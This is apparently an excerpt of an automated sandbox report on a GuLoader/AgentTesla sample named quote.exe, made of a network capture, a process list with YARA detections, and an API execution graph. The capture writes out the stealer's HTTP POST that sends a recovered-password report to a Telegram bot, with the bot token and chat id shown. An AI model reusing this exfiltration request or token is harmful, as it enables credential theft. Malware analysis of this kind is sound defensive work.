                                                                                    2022-08-21 23:57:29 UTC208INData Raw: b5 80 52 88 44 54 a6 01 95 cf dd 67 77 3d c7 05 f3 61 43 b1 4a 09 96 b0 ac d5 fd 65 9a 27 27 93 47 4c 56 31 b0 0e 4f 48 1f 9b 9d 18 a7 32 89 53 f3 ad 6a 77 f3 c9 7b cd dc ce 93 89 92 fc 7c 70 71 96 61 96 10 d8 b8 aa 30 b4 87 88 84 a0 24 40 d7 ee 59 c9 a3 c5 af 8e dd d3 46 13 69 b1 4d 62 e9 fd 4c cb 7c d6 6b 52 d4 d3 8c 90 c5 b7 a5 00 20 d4 09 98 1d d6 f0 62 3e 24 49 56 6d 6a e9 93 4f 9f de 2f c6 c8 87 c6 e8 fb 82 d2 d7 ad 93 bb 7f a9 8f 5a 71 7f 96 47 9f 02 c1 df f2 e2 27 67 48 61 b9 41 a9 e4 9d 6b c0 9d fb f6 2b 97 6a 8e d7 11 f4 8d 41 cf 55 ec 47 17 7a 31 e8 09 f5 03 71 82 75 79 d3 a6 4c 92 45 b4 27 d6 c1 18 b4 ca 2c e9 d3 48 2d c2 c3 81 17 4d 9a 99 5a 6f ea e5 2e bd 72 1c b5 9e 87 49 81 1a ba d1 c8 96 52 de 0e c0 29 7d 77 9f b9 3c d8 06 96 e9 f9 f9 82
                                                                                    Data Ascii: RDTgw=aCJe''GLV1OH2Sjw{|pqa0$@YFiMbL|kR b>$IVmjO/ZqG'gHaAk+jAUGz1quyLE',H-MZo.rIR)}w<


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.11.2049751149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2022-08-21 23:57:41 UTC211OUTPOST /bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=---------------------------8da83e555899ef5
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1017
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    2022-08-21 23:57:41 UTC211INHTTP/1.1 100 Continue
                                                                                    2022-08-21 23:57:41 UTC211OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 38 33 65 35 35 35 38 39 39 65 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 32 37 30 35 37 30 34 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 38 33 65 35 35 35 38 39 39 65 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 32 35 38 35 35 35 0a 4f 53 46 75 6c
                                                                                    Data Ascii: -----------------------------8da83e555899ef5Content-Disposition: form-data; name="chat_id"5270570406-----------------------------8da83e555899ef5Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/258555OSFul
                                                                                    2022-08-21 23:57:41 UTC212INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Sun, 21 Aug 2022 23:57:41 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 629
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    {"ok":true,"result":{"message_id":1624,"from":{"id":5148862528,"is_bot":true,"first_name":"originlogger0093_bot","username":"originlogger0093_bot"},"chat":{"id":5270570406,"first_name":"Ken","last_name":"P","type":"private"},"date":1661126261,"document":{"file_name":"user-258555 2022-08-22 02-20-41.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIGWGMCxnUsE0Qpbx_9vRJ3tMcilgSlAAJ5CwACnOgZUEiBsgGoJPVQKQQ","file_unique_id":"AgADeQsAApzoGVA","file_size":443},"caption":"New PW Recovered!\n\nUser Name: user/258555\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:01:57:00
                                                                                    Start date:22/08/2022
                                                                                    Path:C:\Users\user\Desktop\quote.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\quote.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:183096 bytes
                                                                                    MD5 hash:016EAF77DF40F3BEA1AAB54078A6C7A8
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Target ID:3
                                                                                    Start time:01:57:19
                                                                                    Start date:22/08/2022
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\quote.exe"
                                                                                    Imagebase:0xcb0000
                                                                                    File size:108664 bytes
                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000000.1203658482.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate

                                                                                    Target ID:5
                                                                                    Start time:01:57:19
                                                                                    Start date:22/08/2022
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff684650000
                                                                                    File size:875008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:4.3%
                                                                                      Dynamic/Decrypted Code Coverage:34%
                                                                                      Signature Coverage:33.3%
                                                                                      Total number of Nodes:1509
                                                                                      Total number of Limit Nodes:89
                                                                                      execution_graph 17622 2c92a8c 17625 2c92ab2 NtProtectVirtualMemory 17622->17625 17624 2c92aaf 17625->17624 18984 402614 18985 402d3e 17 API calls 18984->18985 18986 40261b 18985->18986 18989 405f07 GetFileAttributesW CreateFileW 18986->18989 18988 402627 18989->18988 19028 402636 19029 402665 19028->19029 19030 40264a 19028->19030 19032 402695 19029->19032 19033 40266a 19029->19033 19031 402d1c 17 API calls 19030->19031 19042 402651 19031->19042 19034 402d3e 17 API calls 19032->19034 19035 402d3e 17 API calls 19033->19035 19036 40269c lstrlenW 19034->19036 19037 402671 19035->19037 19036->19042 19045 406433 WideCharToMultiByte 19037->19045 19039 402685 lstrlenA 19039->19042 19040 4026df 19041 4026c9 19041->19040 19043 405fb9 WriteFile 19041->19043 19042->19040 19042->19041 19044 405fe8 5 API calls 19042->19044 19043->19040 19044->19041 19045->19039 17404 405a3d ShellExecuteExW 16410 2c91e4b 16424 2c8ac08 16410->16424 16411 2c90063 GetPEB NtProtectVirtualMemory NtResumeThread 16411->16424 16412 2c91ee3 GetPEB 16442 2c92ab2 NtProtectVirtualMemory 16412->16442 16414 2c92aaf 16416 2c929c2 16419 2c929e9 16416->16419 16420 2c83e14 16416->16420 16417 2c92735 16444 2c92ab2 NtProtectVirtualMemory 16417->16444 16418 2c925fb 16443 2c92ab2 NtProtectVirtualMemory 16418->16443 16419->16414 16445 2c92ab2 NtProtectVirtualMemory 16419->16445 16440 2c938bb 16420->16440 16423 2c928bb 16424->16410 16424->16411 16424->16412 16424->16416 16424->16417 16424->16418 16424->16419 16427 2c87c20 16424->16427 16446 2c938c0 16440->16446 16442->16424 16443->16427 16444->16423 16445->16414 16447 2c93914 16446->16447 16447->16447 16448 2c93ab4 NtResumeThread 16447->16448 16449 2c93b22 16448->16449 16502 4034c5 SetErrorMode GetVersion 16503 403504 16502->16503 16504 40350a 16502->16504 16505 406806 5 API calls 16503->16505 16506 406796 3 API calls 16504->16506 16505->16504 16507 403520 lstrlenA 16506->16507 16507->16504 16508 403530 16507->16508 16509 406806 5 API calls 16508->16509 16510 403537 16509->16510 16511 406806 5 API calls 16510->16511 16512 40353e 16511->16512 16513 406806 5 API calls 16512->16513 16514 40354a #17 OleInitialize SHGetFileInfoW 16513->16514 16592 406411 lstrcpynW 16514->16592 16517 403596 GetCommandLineW 16593 406411 lstrcpynW 16517->16593 16519 4035a8 16520 405d13 CharNextW 16519->16520 16521 4035cd CharNextW 16520->16521 16522 4036f7 GetTempPathW 16521->16522 16527 4035e6 16521->16527 16594 403494 16522->16594 16524 40370f 16525 403713 GetWindowsDirectoryW lstrcatW 16524->16525 16526 403769 DeleteFileW 16524->16526 16528 403494 12 API calls 16525->16528 16604 403015 GetTickCount GetModuleFileNameW 16526->16604 16529 405d13 CharNextW 16527->16529 16534 4036e0 16527->16534 16536 4036e2 16527->16536 16531 40372f 16528->16531 16529->16527 16531->16526 16533 403733 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 16531->16533 16532 40377d 16538 405d13 CharNextW 16532->16538 16574 403820 16532->16574 16587 403830 16532->16587 16537 403494 12 API calls 16533->16537 16534->16522 16688 406411 lstrcpynW 16536->16688 16542 403761 16537->16542 16555 40379c 16538->16555 16542->16526 16542->16587 16543 40396a 16546 403972 GetCurrentProcess OpenProcessToken 16543->16546 16547 4039ee ExitProcess 16543->16547 16544 40384a 16698 405a77 16544->16698 16552 40398a LookupPrivilegeValueW AdjustTokenPrivileges 16546->16552 16553 4039be 16546->16553 16549 403860 16557 4059e2 5 API calls 16549->16557 16550 4037fa 16556 405dee 18 API calls 16550->16556 16552->16553 16554 406806 5 API calls 16553->16554 16568 4039c5 16554->16568 16555->16549 16555->16550 16558 403806 16556->16558 16559 403865 lstrcatW 16557->16559 16558->16587 16689 406411 lstrcpynW 16558->16689 16561 403881 lstrcatW lstrcmpiW 16559->16561 16562 403876 lstrcatW 16559->16562 16560 4039da ExitWindowsEx 16560->16547 16564 4039e7 16560->16564 16563 40389d 16561->16563 16561->16587 16562->16561 16566 4038a2 16563->16566 16567 4038a9 16563->16567 16707 40140b 16564->16707 16572 405948 4 API calls 16566->16572 16573 4059c5 2 API calls 16567->16573 16568->16560 16568->16564 16570 403815 16690 406411 lstrcpynW 16570->16690 16575 4038a7 16572->16575 16576 4038ae SetCurrentDirectoryW 16573->16576 16632 403ae0 16574->16632 16575->16576 16577 4038c9 16576->16577 16578 4038be 16576->16578 16703 406411 lstrcpynW 16577->16703 16702 406411 lstrcpynW 16578->16702 16581 40644e 17 API calls 16582 403908 DeleteFileW 16581->16582 16583 403915 CopyFileW 16582->16583 16589 4038d7 16582->16589 16583->16589 16584 40395e 16586 4061d7 36 API calls 16584->16586 16585 4061d7 36 API calls 16585->16589 16586->16587 16691 403a06 16587->16691 16588 40644e 17 API calls 16588->16589 16589->16581 16589->16584 16589->16585 16589->16588 16591 403949 CloseHandle 16589->16591 16704 4059fa CreateProcessW 16589->16704 16591->16589 16592->16517 16593->16519 16595 4066c0 5 API calls 16594->16595 16596 4034a0 16595->16596 16597 4034aa 16596->16597 16598 405ce6 3 API calls 16596->16598 16597->16524 16599 4034b2 16598->16599 16600 4059c5 2 API calls 16599->16600 16601 4034b8 16600->16601 16710 405f36 16601->16710 16714 405f07 GetFileAttributesW CreateFileW 16604->16714 16606 403055 16627 403065 16606->16627 16715 406411 lstrcpynW 16606->16715 16608 40307b 16609 405d32 2 API calls 16608->16609 16610 403081 16609->16610 16716 406411 lstrcpynW 16610->16716 16612 40308c GetFileSize 16613 403186 16612->16613 16625 4030a3 16612->16625 16717 402fb1 16613->16717 16615 40318f 16617 4031bf GlobalAlloc 16615->16617 16615->16627 16729 40347d SetFilePointer 16615->16729 16616 403467 ReadFile 16616->16625 16728 40347d SetFilePointer 16617->16728 16618 4031f2 16623 402fb1 6 API calls 16618->16623 16621 4031a8 16624 403467 ReadFile 16621->16624 16622 4031da 16626 40324c 31 API calls 16622->16626 16623->16627 16628 4031b3 16624->16628 16625->16613 16625->16616 16625->16618 16625->16627 16629 402fb1 6 API calls 16625->16629 16630 4031e6 16626->16630 16627->16532 16628->16617 16628->16627 16629->16625 16630->16627 16630->16630 16631 403223 SetFilePointer 16630->16631 16631->16627 16633 406806 5 API calls 16632->16633 16634 403af4 16633->16634 16635 403afa GetUserDefaultUILanguage 16634->16635 16636 403b0c 16634->16636 16734 406358 wsprintfW 16635->16734 16638 4062df 3 API calls 16636->16638 16640 403b3c 16638->16640 16639 403b0a 16735 403db6 16639->16735 16641 403b5b lstrcatW 16640->16641 16642 4062df 3 API calls 16640->16642 16641->16639 16642->16641 16645 405dee 18 API calls 16646 403b8d 16645->16646 16647 403c21 16646->16647 16649 4062df 3 API calls 16646->16649 16648 405dee 18 API calls 16647->16648 16650 403c27 16648->16650 16651 403bbf 16649->16651 16652 403c37 LoadImageW 16650->16652 16653 40644e 17 API calls 16650->16653 16651->16647 16656 403be0 lstrlenW 16651->16656 16659 405d13 CharNextW 16651->16659 16654 403cdd 16652->16654 16655 403c5e RegisterClassW 16652->16655 16653->16652 16658 40140b 2 API calls 16654->16658 16657 403c94 SystemParametersInfoW CreateWindowExW 16655->16657 16687 403ce7 16655->16687 16660 403c14 16656->16660 16661 403bee lstrcmpiW 16656->16661 16657->16654 16662 403ce3 16658->16662 16664 403bdd 16659->16664 16663 405ce6 3 API calls 16660->16663 16661->16660 16665 403bfe GetFileAttributesW 16661->16665 16666 403db6 18 API calls 16662->16666 16662->16687 16667 403c1a 16663->16667 16664->16656 16668 403c0a 16665->16668 16670 403cf4 16666->16670 16750 406411 lstrcpynW 16667->16750 16668->16660 16669 405d32 2 API calls 16668->16669 16669->16660 16672 403d00 ShowWindow 16670->16672 16673 403d83 16670->16673 16675 406796 3 API calls 16672->16675 16743 40554c OleInitialize 16673->16743 16677 403d18 16675->16677 16676 403d89 16678 403da5 16676->16678 16679 403d8d 16676->16679 16680 403d26 GetClassInfoW 16677->16680 16682 406796 3 API calls 16677->16682 16681 40140b 2 API calls 16678->16681 16685 40140b 2 API calls 16679->16685 16679->16687 16683 403d50 DialogBoxParamW 16680->16683 16684 403d3a GetClassInfoW RegisterClassW 16680->16684 16681->16687 16682->16680 16686 40140b 2 API calls 16683->16686 16684->16683 16685->16687 16686->16687 16687->16587 16688->16534 16689->16570 16690->16574 16692 403a10 CloseHandle 16691->16692 16693 403a1e 16691->16693 16692->16693 16762 403a4b 16693->16762 16696 405b23 67 API calls 16697 403839 OleUninitialize 16696->16697 16697->16543 16697->16544 16699 405a8c 16698->16699 16700 403858 ExitProcess 16699->16700 16701 405aa0 MessageBoxIndirectW 16699->16701 16701->16700 16702->16577 16703->16589 16705 405a39 16704->16705 16706 405a2d CloseHandle 16704->16706 16705->16589 16706->16705 16708 401389 2 API calls 16707->16708 16709 401420 16708->16709 16709->16547 16711 405f43 GetTickCount GetTempFileNameW 16710->16711 16712 4034c3 16711->16712 16713 405f79 16711->16713 16712->16524 16713->16711 16713->16712 16714->16606 16715->16608 16716->16612 16718 402fd2 16717->16718 16719 402fba 16717->16719 16722 402fe2 GetTickCount 16718->16722 16723 402fda 16718->16723 16720 402fc3 DestroyWindow 16719->16720 16721 402fca 16719->16721 16720->16721 16721->16615 16725 402ff0 CreateDialogParamW ShowWindow 16722->16725 16726 403013 16722->16726 16730 406842 16723->16730 16725->16726 16726->16615 16728->16622 16729->16621 16731 40685f PeekMessageW 16730->16731 16732 406855 DispatchMessageW 16731->16732 16733 402fe0 16731->16733 16732->16731 16733->16615 16734->16639 16736 403dca 16735->16736 16751 406358 wsprintfW 16736->16751 16738 403e3b 16752 403e6f 16738->16752 16740 403b6b 16740->16645 16741 403e40 16741->16740 16742 40644e 17 API calls 16741->16742 16742->16741 16755 4043b3 16743->16755 16745 405596 16746 4043b3 SendMessageW 16745->16746 16748 4055a8 OleUninitialize 16746->16748 16747 40556f 16747->16745 16758 401389 16747->16758 16748->16676 16750->16647 16751->16738 16753 40644e 17 API calls 16752->16753 16754 403e7d SetWindowTextW 16753->16754 16754->16741 16756 4043cb 16755->16756 16757 4043bc SendMessageW 16755->16757 16756->16747 16757->16756 16760 401390 16758->16760 16759 4013fe 16759->16747 16760->16759 16761 4013cb MulDiv SendMessageW 16760->16761 16761->16760 16763 403a59 16762->16763 16764 403a23 16763->16764 16765 403a5e FreeLibrary GlobalFree 16763->16765 16764->16696 16765->16764 16765->16765 16775 4014cb 16776 405479 24 API calls 16775->16776 16777 4014d2 16776->16777 19061 4016cc 19062 402d3e 17 API calls 19061->19062 19063 4016d2 GetFullPathNameW 19062->19063 19064 40170e 19063->19064 19065 4016ec 19063->19065 19066 402bc2 19064->19066 19067 401723 GetShortPathNameW 19064->19067 19065->19064 19068 40676f 2 API calls 19065->19068 19067->19066 19069 4016fe 19068->19069 19069->19064 19071 406411 lstrcpynW 19069->19071 19071->19064 19072 402acf 19073 402d1c 17 API calls 19072->19073 19074 402ad5 19073->19074 19075 402b12 19074->19075 19076 402925 19074->19076 19078 402ae7 19074->19078 19075->19076 19077 40644e 17 API calls 19075->19077 19077->19076 19078->19076 19080 406358 wsprintfW 19078->19080 19080->19076 16872 4020d0 16873 4020e2 16872->16873 16874 402194 16872->16874 16875 402d3e 17 API calls 16873->16875 16876 401423 24 API calls 16874->16876 16877 4020e9 16875->16877 16883 4022ee 16876->16883 16878 402d3e 17 API calls 16877->16878 16879 4020f2 16878->16879 16880 402108 LoadLibraryExW 16879->16880 16881 4020fa GetModuleHandleW 16879->16881 16880->16874 16882 402119 16880->16882 16881->16880 16881->16882 16895 406875 16882->16895 16886 402163 16890 405479 24 API calls 16886->16890 16887 40212a 16888 402132 16887->16888 16889 402149 16887->16889 16891 401423 24 API calls 16888->16891 16900 6f491777 16889->16900 16892 40213a 16890->16892 16891->16892 16892->16883 16893 402186 FreeLibrary 16892->16893 16893->16883 16942 406433 WideCharToMultiByte 16895->16942 16897 406892 16898 406899 GetProcAddress 16897->16898 16899 402124 16897->16899 16898->16899 16899->16886 16899->16887 16901 6f4917aa 16900->16901 16943 6f491b5f 16901->16943 16903 6f4917b1 16904 6f4918d6 16903->16904 16905 6f4917c9 16903->16905 16906 6f4917c2 16903->16906 16904->16892 16975 6f4923e0 16905->16975 16991 6f49239e 16906->16991 16911 6f49182d 16917 6f49187e 16911->16917 16918 6f491833 16911->16918 16912 6f49180f 17004 6f4925b5 16912->17004 16913 6f4917f8 16925 6f4917ee 16913->16925 17001 6f492d83 16913->17001 16914 6f4917df 16916 6f4917e5 16914->16916 16922 6f4917f0 16914->16922 16916->16925 16985 6f492af8 16916->16985 16920 6f4925b5 10 API calls 16917->16920 17023 6f4915c6 16918->17023 16926 6f49186f 16920->16926 16921 6f491815 17015 6f4915b4 16921->17015 16995 6f492770 16922->16995 16925->16911 16925->16912 16933 6f4918c5 16926->16933 17029 6f492578 16926->17029 16931 6f4917f6 16931->16925 16932 6f4925b5 10 API calls 16932->16926 16933->16904 16935 6f4918cf GlobalFree 16933->16935 16935->16904 16939 6f4918b1 16939->16933 17033 6f49153d wsprintfW 16939->17033 16940 6f4918aa FreeLibrary 16940->16939 16942->16897 17036 6f49121b GlobalAlloc 16943->17036 16945 6f491b86 17037 6f49121b GlobalAlloc 16945->17037 16947 6f491dcb GlobalFree GlobalFree GlobalFree 16948 6f491de8 16947->16948 16961 6f491e32 16947->16961 16949 6f4921de 16948->16949 16957 6f491dfd 16948->16957 16948->16961 16951 6f492200 GetModuleHandleW 16949->16951 16949->16961 16950 6f491c86 GlobalAlloc 16967 6f491b91 16950->16967 16954 6f492211 LoadLibraryW 16951->16954 16955 6f492226 16951->16955 16952 6f491cd1 lstrcpyW 16956 6f491cdb lstrcpyW 16952->16956 16953 6f491cef GlobalFree 16953->16967 16954->16955 16954->16961 17044 6f49161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 16955->17044 16956->16967 16957->16961 17040 6f49122c 16957->17040 16959 6f492278 16959->16961 16964 6f492285 lstrlenW 16959->16964 16960 6f492086 17043 6f49121b GlobalAlloc 16960->17043 16961->16903 17045 6f49161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 16964->17045 16965 6f492238 16965->16959 16973 6f492262 GetProcAddress 16965->16973 16967->16947 16967->16950 16967->16952 16967->16953 16967->16956 16967->16960 16967->16961 16968 6f491fc7 GlobalFree 16967->16968 16969 6f49210e 16967->16969 16970 6f49122c 2 API calls 16967->16970 17038 6f49158f GlobalSize GlobalAlloc 16967->17038 16968->16967 16969->16961 16972 6f492176 lstrcpyW 16969->16972 16970->16967 16972->16961 16973->16959 16974 6f49208f 16974->16903 16982 6f4923f8 16975->16982 16976 6f49122c GlobalAlloc lstrcpynW 16976->16982 16978 6f492521 GlobalFree 16981 6f4917cf 16978->16981 16978->16982 16979 6f4924cb GlobalAlloc CLSIDFromString 16979->16978 16980 6f4924a0 GlobalAlloc WideCharToMultiByte 16980->16978 16981->16913 16981->16914 16981->16925 16982->16976 16982->16978 16982->16979 16982->16980 16984 6f4924ea 16982->16984 17047 6f4912ba 16982->17047 16984->16978 17051 6f492704 16984->17051 16988 6f492b0a 16985->16988 16986 6f492baf VirtualAllocEx 16987 6f492bcd 16986->16987 17054 6f492aa2 16987->17054 16988->16986 16990 6f492c99 16990->16925 16992 6f4923b3 16991->16992 16993 6f4923be GlobalAlloc 16992->16993 16994 6f4917c8 16992->16994 16993->16992 16994->16905 16999 6f4927a0 16995->16999 16996 6f49283b GlobalAlloc 17000 6f49285e 16996->17000 16997 6f49284e 16998 6f492854 GlobalSize 16997->16998 16997->17000 16998->17000 16999->16996 16999->16997 17000->16931 17002 6f492d8e 17001->17002 17003 6f492dce GlobalFree 17002->17003 17058 6f49121b GlobalAlloc 17004->17058 17006 6f492638 MultiByteToWideChar 17013 6f4925bf 17006->17013 17007 6f49266b lstrcpynW 17007->17013 17008 6f49265a StringFromGUID2 17008->17013 17009 6f4926a2 GlobalFree 17009->17013 17010 6f49267e wsprintfW 17010->17013 17011 6f4926d7 GlobalFree 17011->16921 17012 6f491272 2 API calls 17012->17013 17013->17006 17013->17007 17013->17008 17013->17009 17013->17010 17013->17011 17013->17012 17059 6f4912e1 17013->17059 17063 6f49121b GlobalAlloc 17015->17063 17017 6f4915b9 17018 6f4915c6 2 API calls 17017->17018 17019 6f4915c3 17018->17019 17020 6f491272 17019->17020 17021 6f49127b GlobalAlloc lstrcpynW 17020->17021 17022 6f4912b5 GlobalFree 17020->17022 17021->17022 17022->16926 17024 6f4915ff lstrcpyW 17023->17024 17025 6f4915d2 wsprintfW 17023->17025 17028 6f491618 17024->17028 17025->17028 17028->16932 17030 6f492586 17029->17030 17032 6f491891 17029->17032 17031 6f4925a2 GlobalFree 17030->17031 17030->17032 17031->17030 17032->16939 17032->16940 17034 6f491272 2 API calls 17033->17034 17035 6f49155e 17034->17035 17035->16933 17036->16945 17037->16967 17039 6f4915ad 17038->17039 17039->16967 17046 6f49121b GlobalAlloc 17040->17046 17042 6f49123b lstrcpynW 17042->16961 17043->16974 17044->16965 17045->16961 17046->17042 17048 6f4912c1 17047->17048 17049 6f49122c 2 API calls 17048->17049 17050 6f4912df 17049->17050 17050->16982 17052 6f492768 17051->17052 17053 6f492712 VirtualAlloc 17051->17053 17052->16984 17053->17052 17055 6f492aad 17054->17055 17056 6f492abd 17055->17056 17057 6f492ab2 GetLastError 17055->17057 17056->16990 17057->17056 17058->17013 17060 6f4912ea 17059->17060 17061 6f49130c 17059->17061 17060->17061 17062 6f4912f0 lstrcpyW 17060->17062 17061->17013 17062->17061 17063->17017 17079 6f4929df 17080 6f492a2f 17079->17080 17081 6f4929ef VirtualProtect 17079->17081 17081->17080 17082 4014d7 17083 402d1c 17 API calls 17082->17083 17084 4014dd Sleep 17083->17084 17086 402bc2 17084->17086 17955 2c86255 17958 2c89d4c GetPEB 17955->17958 17957 2c86266 17972 2c89d73 17958->17972 17959 2c90063 GetPEB NtProtectVirtualMemory NtResumeThread 17959->17972 17960 2c91ee3 GetPEB 17988 2c92ab2 NtProtectVirtualMemory 17960->17988 17962 2c92aaf 17962->17957 17964 2c929c2 17967 2c929e9 17964->17967 17968 2c83e14 17964->17968 17965 2c92735 17990 2c92ab2 NtProtectVirtualMemory 17965->17990 17966 2c925fb 17989 2c92ab2 NtProtectVirtualMemory 17966->17989 17967->17962 17991 2c92ab2 NtProtectVirtualMemory 17967->17991 17973 2c938bb NtResumeThread 17968->17973 17971 2c928bb 17971->17957 17972->17957 17972->17959 17972->17960 17972->17964 17972->17965 17972->17966 17972->17967 17975 2c83dc0 17972->17975 17974 2c87867 17973->17974 17976 2c879c6 17974->17976 17978 2c87b87 17974->17978 17975->17957 17977 2c87a13 17976->17977 17979 2c938bb NtResumeThread 17976->17979 17980 2c87b6a 17977->17980 17982 2c938bb NtResumeThread 17977->17982 17978->17975 17981 2c90bd1 3 API calls 17978->17981 17985 2c9010b 17978->17985 17979->17977 17980->17957 17983 2c900ff 17981->17983 17982->17980 17984 2c90306 3 API calls 17983->17984 17984->17985 17986 2c90306 3 API calls 17985->17986 17987 2c902cb 17986->17987 17987->17957 17988->17972 17989->17975 17990->17971 17991->17962 17116 401ede 17117 402d1c 17 API calls 17116->17117 17118 401ee4 17117->17118 17119 402d1c 17 API calls 17118->17119 17120 401ef0 17119->17120 17121 401f07 EnableWindow 17120->17121 17122 401efc ShowWindow 17120->17122 17123 402bc2 17121->17123 17122->17123 17156 4026e4 17157 402d1c 17 API calls 17156->17157 17166 4026f3 17157->17166 17158 402830 17159 40273d ReadFile 17159->17158 17159->17166 17160 4027d6 17160->17158 17160->17166 17170 405fe8 SetFilePointer 17160->17170 17161 405f8a ReadFile 17161->17166 17163 402832 17179 406358 wsprintfW 17163->17179 17164 40277d MultiByteToWideChar 17164->17166 17166->17158 17166->17159 17166->17160 17166->17161 17166->17163 17166->17164 17167 4027a3 SetFilePointer MultiByteToWideChar 17166->17167 17168 402843 17166->17168 17167->17166 17168->17158 17169 402864 SetFilePointer 17168->17169 17169->17158 17171 406004 17170->17171 17176 40601c 17170->17176 17172 405f8a ReadFile 17171->17172 17173 406010 17172->17173 17174 406025 SetFilePointer 17173->17174 17175 40604d SetFilePointer 17173->17175 17173->17176 17174->17175 17177 406030 17174->17177 17175->17176 17176->17160 17178 405fb9 WriteFile 17177->17178 17178->17176 17179->17158 19123 2c8a860 19124 2c8a875 19123->19124 19127 2c8a82b 19123->19127 19125 2c90bd1 3 API calls 19124->19125 19124->19127 19129 2c9010b 19124->19129 19126 2c900ff 19125->19126 19128 2c90306 3 API calls 19126->19128 19128->19129 19130 2c90306 3 API calls 19129->19130 19131 2c902cb 19130->19131 19132 2c88c64 19133 2c88c85 19132->19133 19136 2c8a884 19133->19136 19135 2c88cef 19137 2c8a8a1 19136->19137 19142 2c8a94a 19136->19142 19138 2c90bd1 3 API calls 19137->19138 19141 2c9010b 19137->19141 19137->19142 19139 2c900ff 19138->19139 19140 2c90306 3 API calls 19139->19140 19140->19141 19143 2c90306 3 API calls 19141->19143 19142->19135 19144 2c902cb 19143->19144 19144->19135 18020 2c8a678 18021 2c8a6d4 18020->18021 18022 2c8a717 18021->18022 18023 2c90bd1 3 API calls 18021->18023 18026 2c9010b 18021->18026 18024 2c900ff 18023->18024 18025 2c90306 3 API calls 18024->18025 18025->18026 18027 2c90306 3 API calls 18026->18027 18028 2c902cb 18027->18028 19155 2c8ac7a 19156 2c8ac99 19155->19156 19160 2c8ac08 19155->19160 19157 2c90063 GetPEB NtProtectVirtualMemory NtResumeThread 19157->19160 19158 2c91ee3 GetPEB 19186 2c92ab2 NtProtectVirtualMemory 19158->19186 19160->19157 19160->19158 19161 2c87c20 19160->19161 19164 2c929c2 